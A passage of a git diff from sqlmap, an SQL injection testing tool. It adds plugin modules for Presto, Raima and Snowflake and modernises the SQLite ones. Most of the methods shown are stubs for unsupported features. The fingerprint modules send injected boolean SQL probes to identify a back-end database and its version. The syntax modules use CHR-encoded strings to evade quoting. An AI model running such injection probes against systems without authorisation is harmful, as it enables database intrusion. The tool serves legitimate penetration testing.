b/plugins/dbms/presto/enumeration.py @@ -0,0 +1,58 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + warnMsg = "on Presto it is not possible to get the banner" + logger.warning(warnMsg) + + return None + + def getCurrentDb(self): + warnMsg = "on Presto it is not possible to get name of the current database (schema)" + logger.warning(warnMsg) + + def isDba(self, user=None): + warnMsg = "on Presto it is not possible to test if current user is DBA" + logger.warning(warnMsg) + + def getUsers(self): + warnMsg = "on Presto it is not possible to enumerate the users" + logger.warning(warnMsg) + + return [] + + def getPasswordHashes(self): + warnMsg = "on Presto it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Presto it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on Presto it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on Presto it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Presto it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/presto/filesystem.py b/plugins/dbms/presto/filesystem.py new file mode 100644 index 00000000000..33793a67f47 --- /dev/null +++ b/plugins/dbms/presto/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on Presto it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on Presto it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/presto/fingerprint.py b/plugins/dbms/presto/fingerprint.py new file mode 100644 index 00000000000..fdc5b7968a6 --- /dev/null +++ b/plugins/dbms/presto/fingerprint.py @@ -0,0 +1,137 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import PRESTO_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.PRESTO) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.PRESTO + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(PRESTO_ALIASES): + setDbms(DBMS.PRESTO) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.PRESTO + logger.info(infoMsg) + + result = inject.checkBooleanExpression("TO_BASE64URL(NULL) IS NULL") + + if result: + infoMsg = "confirming %s" % DBMS.PRESTO + logger.info(infoMsg) + + result = inject.checkBooleanExpression("TO_HEX(FROM_HEX(NULL)) IS NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.PRESTO + logger.warning(warnMsg) + + return False + + setDbms(DBMS.PRESTO) + + if not conf.extensiveFp: + return True + + infoMsg = "actively fingerprinting %s" % DBMS.PRESTO + logger.info(infoMsg) + + # Reference: https://prestodb.io/docs/current/release/release-0.200.html + if inject.checkBooleanExpression("FROM_IEEE754_32(NULL) IS NULL"): + Backend.setVersion(">= 0.200") + # Reference: https://prestodb.io/docs/current/release/release-0.193.html + elif inject.checkBooleanExpression("NORMAL_CDF(NULL,NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.193") + # Reference: https://prestodb.io/docs/current/release/release-0.183.html + elif inject.checkBooleanExpression("MAP_ENTRIES(NULL) IS NULL"): + Backend.setVersion(">= 0.183") + # Reference: https://prestodb.io/docs/current/release/release-0.171.html + elif inject.checkBooleanExpression("CODEPOINT(NULL) IS NULL"): + Backend.setVersion(">= 0.171") + # Reference: https://prestodb.io/docs/current/release/release-0.162.html + elif inject.checkBooleanExpression("XXHASH64(NULL) IS NULL"): + Backend.setVersion(">= 0.162") + # Reference: https://prestodb.io/docs/current/release/release-0.151.html + elif inject.checkBooleanExpression("COSINE_SIMILARITY(NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.151") + # Reference: https://prestodb.io/docs/current/release/release-0.143.html + elif inject.checkBooleanExpression("TRUNCATE(NULL) IS NULL"): + Backend.setVersion(">= 0.143") + # Reference: https://prestodb.io/docs/current/release/release-0.137.html + elif inject.checkBooleanExpression("BIT_COUNT(NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.137") + # Reference: https://prestodb.io/docs/current/release/release-0.130.html + elif inject.checkBooleanExpression("MAP_CONCAT(NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.130") + # Reference: https://prestodb.io/docs/current/release/release-0.115.html + elif inject.checkBooleanExpression("SHA1(NULL) IS NULL"): + Backend.setVersion(">= 0.115") + # Reference: https://prestodb.io/docs/current/release/release-0.100.html + elif inject.checkBooleanExpression("SPLIT(NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.100") + # Reference: https://prestodb.io/docs/current/release/release-0.70.html + elif inject.checkBooleanExpression("GREATEST(NULL,NULL) IS NULL"): + Backend.setVersion(">= 0.70") + else: + Backend.setVersion("< 0.100") + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.PRESTO + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/presto/syntax.py b/plugins/dbms/presto/syntax.py new file mode 100644 index 00000000000..7ba5c8b9f38 --- /dev/null +++ b/plugins/dbms/presto/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/presto/takeover.py b/plugins/dbms/presto/takeover.py new file mode 100644 index 00000000000..ab6233905d6 --- /dev/null +++ b/plugins/dbms/presto/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Presto it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Presto it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Presto it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Presto it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/raima/__init__.py b/plugins/dbms/raima/__init__.py new file mode 100644 index 00000000000..ab55bcffd6c --- /dev/null +++ b/plugins/dbms/raima/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import RAIMA_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.raima.enumeration import Enumeration +from plugins.dbms.raima.filesystem import Filesystem +from plugins.dbms.raima.fingerprint import Fingerprint +from plugins.dbms.raima.syntax import Syntax +from plugins.dbms.raima.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class RaimaMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Raima methods + """ + + def __init__(self): + self.excludeDbsList = RAIMA_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.RAIMA] = Syntax.escape diff --git a/plugins/dbms/raima/connector.py b/plugins/dbms/raima/connector.py new file mode 100644 index 00000000000..75e1c30f8fc --- /dev/null +++ b/plugins/dbms/raima/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on Raima Database Manager it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/raima/enumeration.py b/plugins/dbms/raima/enumeration.py new file mode 100644 index 00000000000..b0cbd38208a --- /dev/null +++ b/plugins/dbms/raima/enumeration.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + warnMsg = "on Raima Database Manager it is not possible to get the banner" + logger.warning(warnMsg) + + return None + + def getCurrentUser(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate the current user" + logger.warning(warnMsg) + + def getCurrentDb(self): + warnMsg = "on Raima Database Manager it is not possible to get name of the current database" + logger.warning(warnMsg) + + def isDba(self, user=None): + warnMsg = "on Raima Database Manager it is not possible to test if current user is DBA" + logger.warning(warnMsg) + + def getUsers(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate the users" + logger.warning(warnMsg) + + return [] + + def getPasswordHashes(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Raima Database Manager it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getDbs(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate databases (use only '--tables')" + logger.warning(warnMsg) + + return [] + + def searchDb(self): + warnMsg = "on Raima Database Manager it is not possible to search databases" + logger.warning(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on Raima Database Manager it is not possible to search tables" + logger.warning(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on Raima Database Manager it is not possible to search columns" + logger.warning(warnMsg) + + return [] + + def search(self): + warnMsg = "on Raima Database Manager search option is not available" + logger.warning(warnMsg) + + def getHostname(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Raima Database Manager it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/raima/filesystem.py b/plugins/dbms/raima/filesystem.py new file mode 100644 index 00000000000..817d0e20ff6 --- /dev/null +++ b/plugins/dbms/raima/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on Raima Database Manager it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on Raima Database Manager it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/raima/fingerprint.py b/plugins/dbms/raima/fingerprint.py new file mode 100644 index 00000000000..a62a674dedf --- /dev/null +++ b/plugins/dbms/raima/fingerprint.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import METADB_SUFFIX +from lib.core.settings import RAIMA_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.RAIMA) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.RAIMA + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(RAIMA_ALIASES): + setDbms(DBMS.RAIMA) + return True + + infoMsg = "testing %s" % DBMS.RAIMA + logger.info(infoMsg) + + result = inject.checkBooleanExpression("ROWNUMBER()=ROWNUMBER()") + + if result: + infoMsg = "confirming %s" % DBMS.RAIMA + logger.info(infoMsg) + + result = inject.checkBooleanExpression("INSSTR('[RANDSTR1]',0,0,'[RANDSTR2]') IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.RAIMA + logger.warning(warnMsg) + + return False + + setDbms(DBMS.RAIMA) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.RAIMA + logger.warning(warnMsg) + + return False + + def forceDbmsEnum(self): + conf.db = ("%s%s" % (DBMS.RAIMA, METADB_SUFFIX)).replace(' ', '_') diff --git a/plugins/dbms/raima/syntax.py b/plugins/dbms/raima/syntax.py new file mode 100644 index 00000000000..cfc1c86a8ca --- /dev/null +++ b/plugins/dbms/raima/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHAR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/raima/takeover.py b/plugins/dbms/raima/takeover.py new file mode 100644 index 00000000000..01bce20a13d --- /dev/null +++ b/plugins/dbms/raima/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Raima Database Manager it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Raima Database Manager it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Raima Database Manager it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Raima Database Manager it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/snowflake/__init__.py b/plugins/dbms/snowflake/__init__.py new file mode 100644 index 00000000000..c3318596441 --- /dev/null +++ b/plugins/dbms/snowflake/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import SNOWFLAKE_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.snowflake.enumeration import Enumeration +from plugins.dbms.snowflake.filesystem import Filesystem +from plugins.dbms.snowflake.fingerprint import Fingerprint +from plugins.dbms.snowflake.syntax import Syntax +from plugins.dbms.snowflake.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class SnowflakeMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Snowflake methods + """ + + def __init__(self): + self.excludeDbsList = SNOWFLAKE_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.SNOWFLAKE] = Syntax.escape diff --git a/plugins/dbms/snowflake/connector.py b/plugins/dbms/snowflake/connector.py new file mode 100644 index 00000000000..c24f3ab17b6 --- /dev/null +++ b/plugins/dbms/snowflake/connector.py @@ -0,0 +1,70 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import snowflake.connector +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.convert import getText +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://www.snowflake.com/ + User guide: https://docs.snowflake.com/en/developer-guide/python-connector/python-connector + API: https://docs.snowflake.com/en/developer-guide/python-connector/python-connector-api + """ + + def __init__(self): + GenericConnector.__init__(self) + + def connect(self): + self.initConnection() + + try: + self.connector = snowflake.connector.connect( + user=self.user, + password=self.password, + account=self.account, + warehouse=self.warehouse, + database=self.db, + schema=self.schema + ) + cursor = self.connector.cursor() + cursor.execute("SELECT CURRENT_VERSION()") + cursor.close() + + except Exception as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except Exception as ex: + logger.log(logging.WARNING if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(getText(query)) + except Exception as ex: + logger.log(logging.WARNING if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + return None + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/snowflake/enumeration.py b/plugins/dbms/snowflake/enumeration.py new file mode 100644 index 00000000000..c742a6960c9 --- /dev/null +++ b/plugins/dbms/snowflake/enumeration.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on Snowflake it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on Snowflake it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def searchDb(self): + warnMsg = "on Snowflake it is not possible to search databases" + logger.warning(warnMsg) + return [] + + def searchColumn(self): + errMsg = "on Snowflake it is not possible to search columns" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/snowflake/filesystem.py b/plugins/dbms/snowflake/filesystem.py new file mode 100644 index 00000000000..23ba254b08b --- /dev/null +++ b/plugins/dbms/snowflake/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on Snowflake it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on Snowflake it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/snowflake/fingerprint.py b/plugins/dbms/snowflake/fingerprint.py new file mode 100644 index 00000000000..512e7427e4c --- /dev/null +++ b/plugins/dbms/snowflake/fingerprint.py @@ -0,0 +1,95 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import SNOWFLAKE_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.SNOWFLAKE) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.SNOWFLAKE + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + """ + References for fingerprint: + + * https://docs.snowflake.com/en/sql-reference/functions/current_warehouse + * https://docs.snowflake.com/en/sql-reference/functions/md5_number_upper64 + """ + + if not conf.extensiveFp and Backend.isDbmsWithin(SNOWFLAKE_ALIASES): + setDbms("%s %s" % (DBMS.SNOWFLAKE, Backend.getVersion())) + self.getBanner() + return True + + infoMsg = "testing %s" % DBMS.SNOWFLAKE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("CURRENT_WAREHOUSE()=CURRENT_WAREHOUSE()") + if result: + infoMsg = "confirming %s" % DBMS.SNOWFLAKE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("MD5_NUMBER_UPPER64('[RANDSTR]')=MD5_NUMBER_UPPER64('[RANDSTR]')") + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.SNOWFLAKE + logger.warning(warnMsg) + return False + + setDbms(DBMS.SNOWFLAKE) + self.getBanner() + return True + + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.SNOWFLAKE + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/snowflake/syntax.py b/plugins/dbms/snowflake/syntax.py new file mode 100644 index 00000000000..7ba5c8b9f38 --- /dev/null +++ b/plugins/dbms/snowflake/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/snowflake/takeover.py b/plugins/dbms/snowflake/takeover.py new file mode 100644 index 00000000000..0acd82169f0 --- /dev/null +++ b/plugins/dbms/snowflake/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Snowflake it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Snowflake it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Snowflake it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Snowflake it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py index c71ff98760f..cb8703b7a6f 100644 --- a/plugins/dbms/sqlite/__init__.py +++ b/plugins/dbms/sqlite/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class SQLiteMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Tak def __init__(self): self.excludeDbsList = SQLITE_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.SQLITE] = Syntax.escape diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py index 7352cc733ce..0b167273df1 100644 --- a/plugins/dbms/sqlite/connector.py +++ b/plugins/dbms/sqlite/connector.py @@ -1,25 +1,25 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import sqlite3 -except ImportError: +except: pass import logging -from lib.core.convert import utf8encode +from lib.core.common import getSafeExString +from lib.core.convert import getText from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapMissingDependence from plugins.generic.connector import Connector as GenericConnector - class Connector(GenericConnector): """ Homepage: http://pysqlite.googlecode.com/ and http://packages.ubuntu.com/quantal/python-sqlite @@ -46,9 +46,9 @@ def connect(self): cursor.execute("SELECT * FROM sqlite_master") cursor.close() - except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: + except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError): warnMsg = "unable to connect using SQLite 3 library, trying with SQLite 2" - logger.warn(warnMsg) + logger.warning(warnMsg) try: try: @@ -60,26 +60,26 @@ def connect(self): self.__sqlite = sqlite self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) - except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: - raise SqlmapConnectionException(msg[0]) + except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except self.__sqlite.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) + except self.__sqlite.OperationalError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) return None def execute(self, query): try: - self.cursor.execute(utf8encode(query)) - except self.__sqlite.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) - except self.__sqlite.DatabaseError, msg: - raise SqlmapConnectionException(msg[0]) + self.cursor.execute(getText(query)) + except self.__sqlite.OperationalError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + except self.__sqlite.DatabaseError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff 